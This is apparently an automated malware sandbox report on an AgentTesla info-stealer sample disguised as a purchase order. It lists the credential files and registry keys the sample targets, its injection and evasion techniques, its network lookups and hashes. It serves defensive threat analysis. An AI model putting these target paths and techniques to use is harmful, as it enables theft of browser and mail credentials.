                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\PO-095325.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PO-095325.scr.exe.3949b80.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000004.00000002.4463449563.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2029531706.00000000038F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: PO-095325.scr.exe PID: 4424, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1992, type: MEMORYSTR
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: Yara matchFile source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PO-095325.scr.exe.3949b80.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000004.00000002.4463449563.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.4466181997.0000000003314000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2029531706.00000000038F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: PO-095325.scr.exe PID: 4424, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1992, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.PO-095325.scr.exe.3949b80.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000004.00000002.4463449563.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2029531706.00000000038F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: PO-095325.scr.exe PID: 4424, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1992, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                    Windows Management Instrumentation                    		1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		1
                    Disable or Modify Tools                    		1
                    OS Credential Dumping                    		1
                    File and Directory Discovery                    		Remote Services11
                    Archive Collected Data                    		1
                    Ingress Tool Transfer                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Command and Scripting Interpreter                    		Boot or Logon Initialization Scripts311
                    Process Injection                    		1
                    Deobfuscate/Decode Files or Information                    		21
                    Input Capture                    		34
                    System Information Discovery                    		Remote Desktop Protocol1
                    Data from Local System                    		11
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)21
                    Obfuscated Files or Information                    		Security Account Manager431
                    Security Software Discovery                    		SMB/Windows Admin Shares1
                    Email Collection                    		2
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                    Software Packing                    		NTDS1
                    Process Discovery                    		Distributed Component Object Model21
                    Input Capture                    		13
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    Timestomp                    		LSA Secrets161
                    Virtualization/Sandbox Evasion                    		SSH1
                    Clipboard Data                    		Fallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    DLL Side-Loading                    		Cached Domain Credentials1
                    Application Window Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                    Masquerading                    		DCSync1
                    System Network Configuration Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job161
                    Virtualization/Sandbox Evasion                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt311
                    Process Injection                    		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1428828 Sample: PO-095325.scr.exe Startdate: 19/04/2024 Architecture: WINDOWS Score: 100 22 ip-api.com 2->22 24 api.ipify.org 2->24 32 Found malware configuration 2->32 34 Malicious sample detected (through community Yara rule) 2->34 36 Antivirus detection for URL or domain 2->36 38 8 other signatures 2->38 8 PO-095325.scr.exe 3 2->8         started        11 svchost.exe 1 1 2->11         started        signatures3 process4 dnsIp5 40 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 8->40 42 Writes to foreign memory regions 8->42 44 Allocates memory in foreign processes 8->44 46 Injects a PE file into a foreign processes 8->46 14 RegAsm.exe 15 2 8->14         started        18 powershell.exe 21 8->18         started        26 127.0.0.1 unknown unknown 11->26 signatures6 process7 dnsIp8 28 ip-api.com 208.95.112.1, 49708, 80 TUT-ASUS United States 14->28 30 api.ipify.org 104.26.12.205, 443, 49707 CLOUDFLARENETUS United States 14->30 48 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 14->48 50 Tries to steal Mail credentials (via file / registry access) 14->50 52 Tries to harvest and steal browser information (history, passwords, etc) 14->52 56 2 other signatures 14->56 54 Loading BitLocker PowerShell Module 18->54 20 conhost.exe 18->20         started        signatures9 process10

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    PO-095325.scr.exe29%ReversingLabsWin32.Trojan.GenSteal
                    PO-095325.scr.exe100%AviraHEUR/AGEN.1308640
                    PO-095325.scr.exe100%Joe Sandbox ML

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
                    https://contoso.com/License0%URL Reputationsafe
                    https://api.ipif80%URL Reputationsafe
                    https://contoso.com/Icon0%URL Reputationsafe
                    http://go.micros0%URL Reputationsafe
                    http://crl.micro0%URL Reputationsafe
                    https://contoso.com/0%URL Reputationsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    api.ipify.org
                    		104.26.12.205
                    		truefalse
                      		high
                      ip-api.com
                      		208.95.112.1
                      		truefalse
                        		high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://api.ipify.org/false
                          		high
                          http://ip-api.com/line/?fields=hostingfalse
                            		high

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            https://api.ipify.org/T4RegAsm.exe, 00000004.00000002.4466181997.0000000003374000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2050990678.00000000057A5000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000002.00000002.2047492767.0000000004896000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://account.dyn.com/PO-095325.scr.exe, 00000000.00000002.2029531706.00000000038F9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4463449563.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                    		high
                                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.2047492767.0000000004896000.00000004.00000800.00020000.00000000.sdmptrue
                                    • URL Reputation: malware
                                    		unknown
                                    http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000002.00000002.2047492767.0000000004896000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.2047492767.0000000004896000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://contoso.com/Licensepowershell.exe, 00000002.00000002.2050990678.00000000057A5000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://api.ipif8RegAsm.exe, 00000004.00000002.4466181997.0000000003374000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://contoso.com/Iconpowershell.exe, 00000002.00000002.2050990678.00000000057A5000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://crl.ver)svchost.exe, 00000005.00000002.3638291875.00000214424A8000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		low
                                          https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 00000005.00000003.2028768858.00000214421F0000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.5.dr, edb.log.5.drfalse
                                            		high
                                            https://api.ipify.org/pRegAsm.exe, 00000004.00000002.4466181997.0000000003374000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://api.ipify.org/tRegAsm.exe, 00000004.00000002.4466181997.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4466181997.0000000003374000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://github.com/sam210723/goesrecv-monitor/releases/latestPO-095325.scr.exe, 00000000.00000002.2032466947.0000000005290000.00000004.08000000.00040000.00000000.sdmp, PO-095325.scr.exe, 00000000.00000002.2029531706.00000000038F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://go.microspowershell.exe, 00000002.00000002.2047492767.0000000004BF3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.2047492767.0000000004896000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://api.ipify.orgRegAsm.exe, 00000004.00000002.4466181997.000000000338E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://g.live.com/odclientsettings/Prod/C:edb.log.5.drfalse
                                                        		high
                                                        https://api.ipify.orgPO-095325.scr.exe, 00000000.00000002.2029531706.00000000038F9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4466181997.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4466181997.0000000003374000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4463449563.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://crl.micropowershell.exe, 00000002.00000002.2055731933.0000000008132000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://aka.ms/pscore6lBpowershell.exe, 00000002.00000002.2047492767.0000000004741000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://vksdr.com/goesrecv-monitorPO-095325.scr.exe, 00000000.00000002.2032466947.0000000005290000.00000004.08000000.00040000.00000000.sdmp, PO-095325.scr.exe, 00000000.00000002.2029531706.00000000038F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000002.00000002.2047492767.0000000004896000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://contoso.com/powershell.exe, 00000002.00000002.2050990678.00000000057A5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2050990678.00000000057A5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://ip-api.comRegAsm.exe, 00000004.00000002.4466181997.00000000033C6000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4466181997.00000000033AF000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4466181997.0000000003301000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2047492767.0000000004741000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4466181997.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.4466181997.0000000003374000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high

                                                                      World Map of Contacted IPs

                                                                      • No. of IPs < 25%
                                                                      • 25% < No. of IPs < 50%
                                                                      • 50% < No. of IPs < 75%
                                                                      • 75% < No. of IPs

                                                                      Public IPs

                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                      208.95.112.1
                                                                      		ip-api.comUnited States
                                                                      		53334TUT-ASUSfalse
                                                                      104.26.12.205
                                                                      		api.ipify.orgUnited States
                                                                      		13335CLOUDFLARENETUSfalse

                                                                      Private

                                                                      IP
                                                                      127.0.0.1

                                                                      General Information

                                                                      Joe Sandbox version:40.0.0 Tourmaline
                                                                      Analysis ID:1428828
                                                                      Start date and time:2024-04-19 17:13:09 +02:00
                                                                      Joe Sandbox product:CloudBasic
                                                                      Overall analysis duration:0h 8m 53s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:full
                                                                      Cookbook file name:default.jbs
                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                      Number of analysed new started processes analysed:8
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:0
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Sample name:PO-095325.scr.exe
                                                                      Detection:MAL
                                                                      Classification:mal100.troj.spyw.evad.winEXE@7/11@2/3
                                                                      EGA Information:
                                                                      • Successful, ratio: 66.7%
                                                                      HCA Information:
                                                                      • Successful, ratio: 100%
                                                                      • Number of executed functions: 52
                                                                      • Number of non-executed functions: 9
                                                                      Cookbook Comments:
                                                                      • Found application associated with file extension: .exe
                                                                      • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                      Warnings

                                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                      • Excluded IPs from analysis (whitelisted): 184.31.62.93
                                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                                                                      • Execution Graph export aborted for target powershell.exe, PID 5500 because it is empty
                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                      • VT rate limit hit for: PO-095325.scr.exe

                                                                      Simulations

                                                                      Behavior and APIs

                                                                      TimeTypeDescription
                                                                      17:13:58API Interceptor21x Sleep call for process: powershell.exe modified
                                                                      17:13:59API Interceptor3x Sleep call for process: svchost.exe modified
                                                                      17:14:00API Interceptor11650889x Sleep call for process: RegAsm.exe modified

                                                                      Joe Sandbox View / Context

                                                                      IPs

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      208.95.112.1Copy of Poseidon Marine 4th monthly Stores Apr 2024 R3 .xls.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                      • ip-api.com/line/?fields=hosting
                                                                      REMITTANCE COPY.exeGet hashmaliciousAgentTeslaBrowse
                                                                      • ip-api.com/line/?fields=hosting
                                                                      New Voicemail_Daiichi-Sankyo.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                      • ip-api.com/json/?fields=status,country,regionName,city,query
                                                                      DHL.exeGet hashmaliciousAgentTeslaBrowse
                                                                      • ip-api.com/line/?fields=hosting
                                                                      KjCBSM7Ukv.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                                                      • ip-api.com/line/?fields=hosting
                                                                      eO2bqORIJb.exeGet hashmaliciousAgentTeslaBrowse
                                                                      • ip-api.com/line/?fields=hosting
                                                                      SecuriteInfo.com.Win64.Evo-gen.10533.31255.exeGet hashmaliciousUnknownBrowse
                                                                      • ip-api.com/json
                                                                      13w4NM6mPa.exeGet hashmaliciousLummaCBrowse
                                                                      • ip-api.com/json
                                                                      mdWXrbOxsY.exeGet hashmaliciousXehook StealerBrowse
                                                                      • ip-api.com/line/?fields=hosting
                                                                      mdWXrbOxsY.exeGet hashmaliciousXehook StealerBrowse
                                                                      • ip-api.com/line/?fields=hosting
                                                                      104.26.12.205Sky-Beta.exeGet hashmaliciousStealitBrowse
                                                                      • api.ipify.org/?format=json
                                                                      SecuriteInfo.com.Backdoor.Win32.Agent.myuuxz.13708.17224.exeGet hashmaliciousBunny LoaderBrowse
                                                                      • api.ipify.org/
                                                                      lods.cmdGet hashmaliciousRemcosBrowse
                                                                      • api.ipify.org/

                                                                      Domains

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      ip-api.comCopy of Poseidon Marine 4th monthly Stores Apr 2024 R3 .xls.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                      • 208.95.112.1
                                                                      REMITTANCE COPY.exeGet hashmaliciousAgentTeslaBrowse
                                                                      • 208.95.112.1
                                                                      New Voicemail_Daiichi-Sankyo.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                      • 208.95.112.1
                                                                      DHL.exeGet hashmaliciousAgentTeslaBrowse
                                                                      • 208.95.112.1
                                                                      KjCBSM7Ukv.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                                                      • 208.95.112.1
                                                                      eO2bqORIJb.exeGet hashmaliciousAgentTeslaBrowse
                                                                      • 208.95.112.1
                                                                      SecuriteInfo.com.Win64.Evo-gen.10533.31255.exeGet hashmaliciousUnknownBrowse
                                                                      • 208.95.112.1
                                                                      13w4NM6mPa.exeGet hashmaliciousLummaCBrowse
                                                                      • 208.95.112.1
                                                                      mdWXrbOxsY.exeGet hashmaliciousXehook StealerBrowse
                                                                      • 208.95.112.1
                                                                      mdWXrbOxsY.exeGet hashmaliciousXehook StealerBrowse
                                                                      • 208.95.112.1
                                                                      api.ipify.orgCopy of Poseidon Marine 4th monthly Stores Apr 2024 R3 .xls.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                      • 172.67.74.152
                                                                      eOU2MVDmTd.exeGet hashmaliciousCredGrabber, Meduza Stealer, PureLog Stealer, zgRATBrowse
                                                                      • 172.67.74.152
                                                                      Receipt_032114005.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                      • 104.26.13.205
                                                                      eO2bqORIJb.exeGet hashmaliciousAgentTeslaBrowse
                                                                      • 104.26.12.205
                                                                      avp.msiGet hashmaliciousUnknownBrowse
                                                                      • 104.26.12.205
                                                                      https://cvn7.sa.com/invoice.html?app=Get hashmaliciousHTMLPhisherBrowse
                                                                      • 172.67.74.152
                                                                      TiKj3IVDj4.exeGet hashmaliciousMint StealerBrowse
                                                                      • 104.26.13.205
                                                                      TiKj3IVDj4.exeGet hashmaliciousMint StealerBrowse
                                                                      • 104.26.12.205
                                                                      KZWCMNWmmqi9lvI.exeGet hashmaliciousAgentTeslaBrowse
                                                                      • 104.26.12.205
                                                                      Payment.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                                                      • 104.26.13.205

                                                                      ASNs

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      CLOUDFLARENETUShttps://docx-nok.online/Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                      • 172.67.179.148
                                                                      https://download-myproposal.xyzGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                      • 104.17.2.184
                                                                      SenPalia.exeGet hashmaliciousUnknownBrowse
                                                                      • 172.64.41.3
                                                                      Copy of Poseidon Marine 4th monthly Stores Apr 2024 R3 .xls.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                      • 172.67.74.152
                                                                      https://royaltattoo.in/js/kalexander@yourlawyer.comGet hashmaliciousPhisherBrowse
                                                                      • 104.17.25.14
                                                                      SenPalia.exeGet hashmaliciousUnknownBrowse
                                                                      • 104.21.7.115
                                                                      ppop_verification_request.zipGet hashmaliciousUnknownBrowse
                                                                      • 162.159.61.3
                                                                      https://www.dropbox.com/l/scl/AADwcgxTbjuvzakz6kszZMzP6RXavhxhixQGet hashmaliciousHTMLPhisherBrowse
                                                                      • 172.64.150.44
                                                                      eOU2MVDmTd.exeGet hashmaliciousCredGrabber, Meduza Stealer, PureLog Stealer, zgRATBrowse
                                                                      • 172.67.74.152
                                                                      https://cosantinexi.com/Get hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                      • 104.17.2.184
                                                                      TUT-ASUSCopy of Poseidon Marine 4th monthly Stores Apr 2024 R3 .xls.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                      • 208.95.112.1
                                                                      REMITTANCE COPY.exeGet hashmaliciousAgentTeslaBrowse
                                                                      • 208.95.112.1
                                                                      New Voicemail_Daiichi-Sankyo.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                      • 208.95.112.1
                                                                      DHL.exeGet hashmaliciousAgentTeslaBrowse
                                                                      • 208.95.112.1
                                                                      KjCBSM7Ukv.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                                                      • 208.95.112.1
                                                                      eO2bqORIJb.exeGet hashmaliciousAgentTeslaBrowse
                                                                      • 208.95.112.1
                                                                      SecuriteInfo.com.Win64.Evo-gen.10533.31255.exeGet hashmaliciousUnknownBrowse
                                                                      • 208.95.112.1
                                                                      13w4NM6mPa.exeGet hashmaliciousLummaCBrowse
                                                                      • 208.95.112.1
                                                                      mdWXrbOxsY.exeGet hashmaliciousXehook StealerBrowse
                                                                      • 208.95.112.1
                                                                      mdWXrbOxsY.exeGet hashmaliciousXehook StealerBrowse
                                                                      • 208.95.112.1

                                                                      JA3 Fingerprints

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      3b5074b1b5d032e5620f69f9f700ff0eCopy of Poseidon Marine 4th monthly Stores Apr 2024 R3 .xls.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                      • 104.26.12.205
                                                                      W4tW72sfAD.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                      • 104.26.12.205
                                                                      http://www.sushi-idea.comGet hashmaliciousUnknownBrowse
                                                                      • 104.26.12.205
                                                                      Receipt_032114005.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                      • 104.26.12.205
                                                                      DHL.exeGet hashmaliciousAgentTeslaBrowse
                                                                      • 104.26.12.205
                                                                      eInvoicing_pdf.vbsGet hashmaliciousFormBookBrowse
                                                                      • 104.26.12.205
                                                                      KjCBSM7Ukv.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                                                      • 104.26.12.205
                                                                      eO2bqORIJb.exeGet hashmaliciousAgentTeslaBrowse
                                                                      • 104.26.12.205
                                                                      SecuriteInfo.com.Program.Unwanted.5412.9308.3353.exeGet hashmaliciousPureLog StealerBrowse
                                                                      • 104.26.12.205
                                                                      SecuriteInfo.com.Trojan.KillProc2.23108.29569.31585.exeGet hashmaliciousUnknownBrowse
                                                                      • 104.26.12.205

                                                                      Dropped Files

                                                                      No context

                                                                      Created / dropped Files

                                                                      C:\ProgramData\Microsoft\Network\Downloader\edb.chk

                                                                      Download File
                                                                      Process:C:\Windows\System32\svchost.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):8192
                                                                      Entropy (8bit):0.3588072191296206
                                                                      Encrypted:false
                                                                      SSDEEP:6:6xkoaaD0JOCEfMuaaD0JOCEfMKQmDhxkoaaD0JOCEfMuaaD0JOCEfMKQmD:maaD0JcaaD0JwQQ3aaD0JcaaD0JwQQ
                                                                      MD5:663C5D6018506231E334FB3EA962ED1C
                                                                      SHA1:539A4641CE92E57E4ADEE32750A817326E596D4C
                                                                      SHA-256:066CB701C03237D2612AA647E6BF08EF594360F96E433639B0CC9EED7335F1E1
                                                                      SHA-512:5F910653FD1B12B94D314EDEDF6EB2BEC70D369D921EB5B7CF4D199B0374D6C798336E39DBF2781F3B0457280E0DDA63BDF4861DF31C08152544B0F1039D5FCD
                                                                      Malicious:false
                                                                      Reputation:moderate, very likely benign file
                                                                      Preview:*.>.................D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                      Download File
                                                                      Process:C:\Windows\System32\svchost.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):1310720
                                                                      Entropy (8bit):0.8337620509765368
                                                                      Encrypted:false
                                                                      SSDEEP:1536:gJhkM9gB0CnCm0CQ0CESJPB9JbJQfvcso0l1T4MfzzTi1FjIIXYvjbglQdmHDug2:gJjJGtpTq2yv1AuNZRY3diu8iBVqF0
                                                                      MD5:C603912FDC208B0932A9A12D07C47150
                                                                      SHA1:BA2027AC357C1B4E3271D4B2AE0B22EDAFB77495
                                                                      SHA-256:A60DF974F14AE3DBFB2C6F1FBC316849E994FA880AB73F968F89CE9F89D11D3A
